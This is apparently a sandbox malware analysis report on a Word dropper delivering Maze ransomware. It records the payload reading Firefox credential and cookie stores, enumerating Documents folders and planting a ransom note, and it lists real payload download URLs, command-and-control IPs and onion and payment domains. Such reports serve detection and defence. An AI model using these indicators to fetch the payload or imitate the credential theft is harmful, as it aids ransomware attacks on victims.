Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\xulstore.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\previous.js	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\upgrade.js-20150305021524	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\bookmarkbackups\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\pluginreg.dat	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport\state.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\places.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\SiteSecurityServiceState.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\.metadata	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239458107.804b5b8e-3057-4315-ada7-6389f240c010.main.jsonlz4	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp\WINNT_x86-msvc\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\session-state.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\parent.lock	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\0675a2f8-c025-4cb1-98bc-4a943648cf69	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webapps\webapps.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webappsstore.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\times.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\026c3ebc-c6e0-47be-bdb8-30f2cf4bf8d6	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\blocklist.xml	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\addons.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.files\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239617617.0675a2f8-c025-4cb1-98bc-4a943648cf69.main.jsonlz4	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\permissions.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\compatibility.ini	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cookies.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\state.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\search-metadata.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\804b5b8e-3057-4315-ada7-6389f240c010	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\search.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\gmpopenh264.info	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\store.json.mozlz4	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webapps\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\minidumps\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert_override.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\5e4c085c3c4e0000.tmp	Jump to behavior

Searches for user specific document files

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\Default\Documents	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\Default\Documents	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\Public\Documents	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Directory queried: C:\Users\Public\Documents	Jump to behavior

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Simulations

Behavior and APIs

Time	Type	Description
14:03:01	API Interceptor	1858x Sleep call for process: wupd12.14.tmp modified
14:03:20	API Interceptor	13x Sleep call for process: WMIC.exe modified
14:03:49	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt
14:04:03	API Interceptor	448x Sleep call for process: notepad.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Verdi.doc	50%	Virustotal		Browse
Verdi.doc	100%	Avira	VBA/Dldr.Agent.xgnwi
Verdi.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\Temp\wupd12.14.tmp	100%	Avira	TR/AD.MazeRansom.gvzeo
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp	100%	Avira	TR/AD.MazeRansom.gvzeo
C:\Windows\Temp\wupd12.14.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp	5%	Metadefender		Browse
C:\Windows\Temp\wupd12.14.tmp	5%	Metadefender		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.2.wupd12.14.tmp.560000.6.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
5.2.wupd12.14.tmp.4c0000.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
5.0.wupd12.14.tmp.400000.0.unpack	100%	Avira	TR/AD.MazeRansom.gvzeo	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://pur/elements/1.1/xmphttp://nsom/xap/1.0/xmpidqhttp://nsom/xmp/Identifier/qual/1.0/shttp://ns.	0%	Avira URL Cloud	safe
http://91.218.114.31/update/cwmgplanv.jspx?pnv=u&qraq=41g187&g=xu401v60	0%	Avira URL Cloud	safe
http://91.218.114.37/edit/sv.aspx?belw=5gjmhg50qj&horg=lj8r3&w=c221b763t&o=j8k	0%	Avira URL Cloud	safe
http://91.218.114.38/edit/signout/r.htmllAez	0%	Avira URL Cloud	safe
http://91.218.114.26/weu.html?n=641&uy=33vt2	0%	Avira URL Cloud	safe
http://104.168.198.208/wordupd.tmple	0%	Avira URL Cloud	safe
http://91.218.114.26/post/yocs.jspx?mh=gvs58	0%	Avira URL Cloud	safe
http://91.218.114.4/signout/login/ct.html	0%	Avira URL Cloud	safe
http://91.218.114.31/kwa.html?hkex=p77mwf5h44&spi=3ylt07ucfg	0%	Avira URL Cloud	safe
http://91.218.114.32/checkout/transfer/egav.jspx?siwi=5&dqm=08c7m215	0%	Avira URL Cloud	safe
http://91.218.114.11/view/pmptbud.cgi?rif=86ti6ty&f=0tf1w&g=y838tni&fs=g0m3t00x	0%	Avira URL Cloud	safe
http://91.218.114.38/edit/signout/r.html	0%	Avira URL Cloud	safe
http://aoacugmutagkwctu.onion/%USERID%	0%	Avira URL Cloud	safe
http://ns.ad	0%	URL Reputation	safe
http://104.168.198.208/wordupd.tmp	100%	Avira URL Cloud	malware
http://91.218.114.4/payout/account/pfmonqavr.cgi?tw=3&hmn=xk1543j&rr=5852t6v&iwsh=4	0%	Avira URL Cloud	safe
http://91.218.114.11/forum/gr.jspx?qhe=wyw&ap=dq677p3ed&wt=r80141a5h6	0%	Avira URL Cloud	safe
http://aoacugmutagkwctu.onion/5e4c085c3c4e0000	0%	Avira URL Cloud	safe
http://91.218.114.25/tracker/lpvotht.php?ij=74lh01y&if=3h00sur	0%	Avira URL Cloud	safe
http://ns.adbe.	0%	URL Reputation	safe
https://mazedecrypt.top/5e4c085c3c4e0000	0%	Avira URL Cloud	safe
http://104.168.198.208/wordupd.tmpqqC:	0%	Avira URL Cloud	safe
http://91.218.114.25/frysmlbt.asp?pbjg=8skp3i6s&m=4xmo405ctp	0%	Avira URL Cloud	safe
https://mazedecrypt.top/%USERID%	0%	Avira URL Cloud	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

Source	Rule	Description	Author
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
C:\DECRYPT-FILES.txt	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000D.00000002.601857330.00233000.00000004.00000020.sdmp	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
00000005.00000003.587220751.00050000.00000004.00000001.sdmp	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
00000005.00000003.362949001.02770000.00000004.00000001.sdmp	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
00000005.00000003.587200933.00040000.00000004.00000001.sdmp	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
00000005.00000003.587056869.023E0000.00000004.00000001.sdmp	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
00000005.00000003.362928581.023E0000.00000004.00000001.sdmp	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
Process Memory Space: wupd12.14.tmp PID: 3780	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security
Process Memory Space: notepad.exe PID: 1472	JoeSecurity_Maze	Yara detected Maze Ransomware	Joe Security

Unpacked PEs

No yara matches

Sigma Overview

System Summary:

Sigma detected: Registry value set by Microsoft Office in Temp

Show sources

Source: Registry Key set

Author: Joe Security: Data: Details: 28 3E 2E 00 6C 0C 00 00 01 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3180, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems\(>.

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
91.218.114.38	wordupd.exe	Get hash	malicious	Browse	91.218.114.38/payout/archive/fl.php?l=20087b78&lr=7urxg6cb35&ade=nah1wtmf6k
	VERDI (002).doc	Get hash	malicious	Browse	91.218.114.38/auth/login
	RKRnD4GjLu.doc	Get hash	malicious	Browse	91.218.114.38/auth/login
	VERDI.doc	Get hash	malicious	Browse	91.218.114.38/auth/login
91.218.114.26	wordupd.exe	Get hash	malicious	Browse	91.218.114.26/drnwves.jspx?po=3n3
	VERDI (002).doc	Get hash	malicious	Browse	91.218.114.26/forum/pavsusdhmu.aspx?y=2j63m&wnxb=734i5vab4&gooe=15
	RKRnD4GjLu.doc	Get hash	malicious	Browse	91.218.114.26/ofohs.php?mrs=o5tb4i&nl=237i&k=c7y672a08o&ayo=0
	VERDI.doc	Get hash	malicious	Browse	91.218.114.26/update/check/fogdape.jsp?scrs=6rp7i737t&ua=3pt5ps7e1
91.218.114.37	wordupd.exe	Get hash	malicious	Browse	91.218.114.37/bbmwsmllqm.php?wq=x&vo=ufp85q5cd&jtw=54q56l7vd&f=852
	VERDI (002).doc	Get hash	malicious	Browse	91.218.114.37/auth/login
	RKRnD4GjLu.doc	Get hash	malicious	Browse	91.218.114.37/auth/login
	VERDI.doc	Get hash	malicious	Browse	91.218.114.37/sepa/check/adykftyl.jspx
91.218.114.25	wordupd.exe	Get hash	malicious	Browse	91.218.114.25/ulggahv.shtml?vkpl=rmr
	VERDI (002).doc	Get hash	malicious	Browse	91.218.114.25/r.phtml
	RKRnD4GjLu.doc	Get hash	malicious	Browse	91.218.114.25/xlcedcfat.jspx?hna=8&j=my8pa&ocev=t0e1
	VERDI.doc	Get hash	malicious	Browse	91.218.114.25/signin/view/npreg.asp?msxf=38bmx&n=nk7uv&ogwt=s65a24vf&ibs=22h24appr

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unknown	GoogleEarthProSetup.exe	Get hash	malicious	Browse	172.217.23.206
	https://teknova-my.sharepoint.com/:b:/g/personal/jens_karlsson_teknova_se/EUus5-kt6ylJpLQVWENoM-gBztEvK2vvNZNOn1Un9M72-Q	Get hash	malicious	Browse	97.74.6.168
	http://app.harridoza.icu/?u=630wkwf&o=uhhp6zh&t=5ae3bbb32b70aad1b818c6dded9fa9d4&cid=wc9j349gulbl69jqhs41569c&trump=winbigger.club	Get hash	malicious	Browse	193.35.51.12
	Balance-Payment.html	Get hash	malicious	Browse	108.163.231.9
	k8tvLoVAAF.exe	Get hash	malicious	Browse	192.168.2.14
	OHY8adr7PL.exe	Get hash	malicious	Browse	192.168.2.14
	WXO7ibOBUf.exe	Get hash	malicious	Browse	192.168.2.12
	j7BzdiOJV9.exe	Get hash	malicious	Browse	192.168.2.14
	Ve7xJOvTJY.exe	Get hash	malicious	Browse	192.168.2.14
	Gq94UeOwn7.exe	Get hash	malicious	Browse	192.168.2.14
	pzEC0goeOS.exe	Get hash	malicious	Browse	192.168.2.14
	DOCUMENTO 06.doc	Get hash	malicious	Browse	104.18.56.96
	info_11_06.doc	Get hash	malicious	Browse	77.87.212.69
	8zwECUx69c.exe	Get hash	malicious	Browse	192.168.2.14
	2019_05_S1800735585_H0043475.xls	Get hash	malicious	Browse	47.254.236.15
